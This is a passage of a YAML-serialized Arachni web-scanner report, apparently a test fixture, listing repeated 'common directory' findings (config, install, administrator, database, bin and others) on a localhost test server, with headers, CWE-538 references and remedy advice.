    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: conf
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/conf/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/config/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: config
    injected: config
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: config
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/config/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/install/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: install
    injected: install
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: install
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/install/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/installer/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: installer
    injected: installer
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: installer
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/installer/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/shop/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: shop
    injected: shop
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: shop
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/shop/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/private/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: private
    injected: private
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: private
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/private/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/fpadmin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: fpadmin
    injected: fpadmin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: fpadmin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/fpadmin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/administrator/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "13"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: administrator
    injected: administrator
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: administrator
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/administrator/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/intranet/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: intranet
    injected: intranet
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: intranet
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/intranet/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/inventory/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: inventory
    injected: inventory
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: inventory
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/inventory/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/webadmin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: webadmin
    injected: webadmin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: webadmin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/webadmin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/employees/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: employees
    injected: employees
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: employees
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/employees/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/accounting/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: accounting
    injected: accounting
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: accounting
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/accounting/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/tree/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: tree
    injected: tree
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: tree
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/tree/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/pages/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: pages
    injected: pages
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: pages
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/pages/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/users/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: users
    injected: users
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: users
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/users/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/access/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: access
    injected: access
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: access
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/access/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/library/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: library
    injected: library
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: library
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/library/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/database/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: database
    injected: database
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: database
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/database/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/html/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: html
    injected: html
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: html
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/html/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/bin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: bin
    injected: bin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: bin
    severity: Medium
    tags: 
    - path
